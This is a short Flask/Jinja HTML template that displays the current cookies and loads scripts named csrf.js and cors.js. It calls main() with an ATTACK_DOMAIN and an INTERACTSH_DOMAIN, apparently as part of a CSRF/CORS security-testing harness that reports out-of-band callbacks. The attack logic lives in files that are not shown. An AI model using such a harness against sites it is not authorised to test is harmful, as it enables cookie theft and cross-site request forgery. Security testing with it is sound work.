{% extends "base.html" %}

{% block content %}

<script src="{{ url_for('static', filename='js/main.js') }}" type="text/javascript" ></script>
<script src="{{ url_for('static', filename='js/csrf.js') }}" type="text/javascript" ></script>
<script src="{{ url_for('static', filename='js/cors.js') }}" type="text/javascript" ></script>

    <div class="container outline-light">
        <div class="row mt-4 mb-2 text-white">
            <h3>Current cookies</h3>
        </div>
        <div class="row code-block">
            <pre>
<code>
{% for i in cook %}
    {{i}}: {{cook[i]}}
{%- endfor %}
</code>
            </pre>
        </div>
    </div>

<br><br>


<script> main("{{ ATTACK_DOMAIN }}", "{{ INTERACTSH_DOMAIN }}"); </script>

{% endblock %}